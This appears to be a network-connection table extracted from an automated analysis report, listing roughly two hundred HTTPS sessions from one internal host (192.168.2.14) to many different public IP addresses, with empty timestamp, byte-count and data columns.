                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10212192.168.2.1453550115.16.204.94443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10213192.168.2.1447668155.68.56.213443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10214192.168.2.1441208167.198.18.123443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10215192.168.2.1445934159.184.134.229443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10216192.168.2.143810067.219.79.229443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10217192.168.2.144594273.203.131.206443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10218192.168.2.144677838.233.200.65443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10219192.168.2.1449568123.111.126.39443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10220192.168.2.144306095.92.161.252443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10221192.168.2.1458318170.172.122.219443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10222192.168.2.1459034177.242.15.219443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10223192.168.2.143636419.203.30.130443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10224192.168.2.1435628125.100.150.194443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10225192.168.2.1452530221.110.131.243443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10226192.168.2.143505685.99.80.221443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10227192.168.2.144601886.24.250.143443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10228192.168.2.143811644.166.119.122443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10229192.168.2.144111688.4.163.38443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10230192.168.2.1453464178.98.59.127443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10231192.168.2.1446570120.222.236.27443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10232192.168.2.1443202162.143.28.171443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10233192.168.2.1458548221.224.68.169443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10234192.168.2.1438696114.217.4.42443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10235192.168.2.1458598144.36.12.25443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10236192.168.2.145514835.84.191.215443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10237192.168.2.144507673.71.16.149443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10238192.168.2.1452654164.20.207.23443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10239192.168.2.145143446.244.250.34443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10240192.168.2.144384878.81.178.146443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10241192.168.2.145729447.171.231.208443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10242192.168.2.1432778141.148.99.26443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10243192.168.2.144790027.234.91.159443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10244192.168.2.14408129.227.133.193443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10245192.168.2.1452158182.166.76.184443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10246192.168.2.143449652.20.192.183443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10247192.168.2.1444362184.188.164.207443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10248192.168.2.144041868.219.232.41443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10249192.168.2.1444330103.176.199.214443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10250192.168.2.143484854.5.196.215443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10251192.168.2.1456218197.217.35.154443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10252192.168.2.1439850169.85.61.40443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10253192.168.2.144794068.251.67.174443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10254192.168.2.1434240197.112.143.69443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10255192.168.2.14369982.139.49.103443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10256192.168.2.145566024.223.224.65443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10257192.168.2.145439048.244.104.236443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10258192.168.2.145558014.14.111.70443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10259192.168.2.1434954201.16.40.16443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10260192.168.2.145930276.102.224.249443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10261192.168.2.145500262.155.59.71443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10262192.168.2.143857082.0.127.224443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10263192.168.2.143775052.176.25.213443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10264192.168.2.143750678.223.31.62443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10265192.168.2.144721249.24.82.9443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10266192.168.2.1458828219.238.226.151443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10267192.168.2.1441232106.227.53.105443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10268192.168.2.1443704218.125.127.180443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10269192.168.2.1446566124.143.175.125443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10270192.168.2.1458738105.208.169.21443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10271192.168.2.1459146115.223.123.71443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10272192.168.2.145032817.54.185.235443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10273192.168.2.146067444.229.36.39443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10274192.168.2.1455248165.34.50.85443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10275192.168.2.145259475.89.91.15443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10276192.168.2.1455678199.241.224.88443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10277192.168.2.143993886.188.35.11443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10278192.168.2.145512059.17.20.126443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10279192.168.2.1449612100.44.127.181443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10280192.168.2.1438144164.95.160.143443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10281192.168.2.1445516208.75.85.54443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10282192.168.2.143482851.252.254.218443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10283192.168.2.1444424144.93.174.88443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10284192.168.2.145381864.89.79.125443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10285192.168.2.1446068103.251.14.126443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10286192.168.2.143849095.33.45.192443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10287192.168.2.1433888162.96.49.191443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10288192.168.2.1454042116.4.105.86443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10289192.168.2.1455470173.230.138.227443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10290192.168.2.1453166219.96.241.155443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10291192.168.2.1446048221.38.9.10443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10292192.168.2.1453556157.143.119.69443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10293192.168.2.14524689.140.123.215443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10294192.168.2.144501497.172.144.128443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10295192.168.2.1437596115.162.84.36443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10296192.168.2.1453370152.144.210.78443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10297192.168.2.1458244142.250.42.116443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10298192.168.2.1442386222.162.158.195443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10299192.168.2.1438026101.225.246.198443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10300192.168.2.1445582164.21.88.124443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10301192.168.2.143481673.220.107.150443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10302192.168.2.1439486205.95.161.200443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10303192.168.2.1441914187.231.215.74443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10304192.168.2.1453110151.223.1.249443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10305192.168.2.1434440211.129.236.57443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10306192.168.2.1435112110.176.28.100443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10307192.168.2.145816812.162.31.42443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10308192.168.2.1436722145.30.72.232443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10309192.168.2.144744294.255.224.226443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10310192.168.2.1460622172.253.158.233443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10311192.168.2.144574262.170.16.184443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10312192.168.2.144226648.198.68.235443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10313192.168.2.1446522166.100.206.240443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10314192.168.2.145865496.250.216.225443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10315192.168.2.1446734211.152.117.45443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10316192.168.2.1448310144.176.169.61443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10317192.168.2.14467244.45.75.100443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10318192.168.2.1441406107.199.201.229443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10319192.168.2.145036627.187.127.35443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10320192.168.2.1450778202.167.211.241443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10321192.168.2.1456166197.72.121.41443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10322192.168.2.143886240.99.204.45443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10323192.168.2.1442262109.32.46.218443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10324192.168.2.1433448114.73.215.2443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10325192.168.2.1451066203.139.251.207443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10326192.168.2.1441738169.173.237.206443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10327192.168.2.145803691.176.74.39443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10328192.168.2.145682876.105.73.135443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10329192.168.2.1435470112.54.189.56443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10330192.168.2.145083431.76.142.43443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10331192.168.2.1460704184.200.248.159443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10332192.168.2.1441396161.202.211.131443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10333192.168.2.145146881.33.28.145443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10334192.168.2.1437902173.114.106.76443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10335192.168.2.1452994201.136.51.13443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10336192.168.2.1454670128.86.211.72443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10337192.168.2.1450660209.2.188.143443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10338192.168.2.1454796161.230.62.151443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10339192.168.2.143582644.3.16.30443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10340192.168.2.145364463.183.87.35443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10341192.168.2.1460148161.9.216.35443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10342192.168.2.1454904170.117.221.88443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10343192.168.2.1453866207.65.86.33443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10344192.168.2.145260467.132.130.214443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10345192.168.2.144175077.213.80.55443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10346192.168.2.143729684.160.176.76443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10347192.168.2.1449702184.40.240.61443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10348192.168.2.143449457.250.8.51443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10349192.168.2.1439676153.136.230.32443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10350192.168.2.144579020.187.190.240443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10351192.168.2.1443626180.219.73.38443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10352192.168.2.145098094.71.90.205443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10353192.168.2.1452838219.69.85.175443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10354192.168.2.1439028116.164.75.78443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10355192.168.2.145519460.174.113.157443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10356192.168.2.1447234171.158.14.204443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10357192.168.2.1447746103.155.40.62443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10358192.168.2.1446634130.228.212.58443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10359192.168.2.1439028134.4.243.4443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10360192.168.2.1434334115.192.28.98443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10361192.168.2.145178013.82.213.154443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10362192.168.2.1450764196.210.140.64443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10363192.168.2.1453922222.0.52.205443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10364192.168.2.144988038.182.197.29443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10365192.168.2.145439270.32.249.209443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10366192.168.2.1456484216.50.228.65443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10367192.168.2.145896234.46.84.66443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10368192.168.2.1457010160.67.166.166443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10369192.168.2.144187413.238.182.161443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10370192.168.2.1451904141.191.2.182443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10371192.168.2.1440046218.132.41.117443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10372192.168.2.143312270.44.19.80443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10373192.168.2.1449918136.139.100.146443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10374192.168.2.1438644110.39.250.64443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10375192.168.2.144552636.16.9.203443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10376192.168.2.1441672178.122.232.150443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10377192.168.2.144188052.71.221.131443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10378192.168.2.1456212135.111.253.72443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10379192.168.2.143859260.31.122.66443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10380192.168.2.1434570124.86.201.67443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10381192.168.2.1456002107.6.159.208443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10382192.168.2.1446274146.199.94.101443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10383192.168.2.1458602193.144.242.124443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10384192.168.2.1443560191.103.79.250443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10385192.168.2.1442298180.80.28.235443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10386192.168.2.1453610130.242.111.254443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10387192.168.2.1451748213.45.82.228443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10388192.168.2.145648854.121.249.194443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10389192.168.2.145822025.55.233.37443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10390192.168.2.1449232138.37.45.126443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10391192.168.2.1448772217.19.234.96443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10392192.168.2.144000840.213.51.225443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10393192.168.2.144938443.118.108.252443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10394192.168.2.1456934165.212.183.150443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10395192.168.2.144780066.64.40.107443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10396192.168.2.144469459.9.203.252443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10397192.168.2.144047236.44.23.3443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10398192.168.2.1449444150.72.194.78443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10399192.168.2.1443494128.95.61.165443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10400192.168.2.143942483.48.51.110443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10401192.168.2.1438882161.141.235.126443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10402192.168.2.1437384100.246.73.181443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10403192.168.2.1459954119.177.55.73443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10404192.168.2.1449232173.188.59.142443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10405192.168.2.143494093.4.36.75443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10406192.168.2.144396874.26.153.224443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10407192.168.2.143278835.160.94.192443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10408192.168.2.143366258.73.129.18443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10409192.168.2.1434884114.148.84.11443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10410192.168.2.143719440.87.63.89443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10411192.168.2.1453252222.38.53.59443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10412192.168.2.144244084.133.219.195443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10413192.168.2.1436624188.148.134.171443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10414192.168.2.144533457.43.242.183443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10415192.168.2.1448350200.69.217.56443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10416192.168.2.1444606139.203.125.96443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10417192.168.2.1435604171.198.136.222443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10418192.168.2.1441146154.156.237.189443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10419192.168.2.1441902183.175.18.26443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10420192.168.2.145566684.252.136.244443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10421192.168.2.144794091.19.49.152443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10422192.168.2.1451288148.128.208.7443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10423192.168.2.144045074.230.16.20443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10424192.168.2.1441012218.24.37.16443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10425192.168.2.143558266.177.80.222443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10426192.168.2.1456228132.133.19.81443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10427192.168.2.145553832.106.133.226443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10428192.168.2.1440086131.181.253.226443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10429192.168.2.1453814207.180.167.250443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10430192.168.2.145164843.200.88.247443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10431192.168.2.1445322177.57.7.70443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10432192.168.2.144800272.80.237.51443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
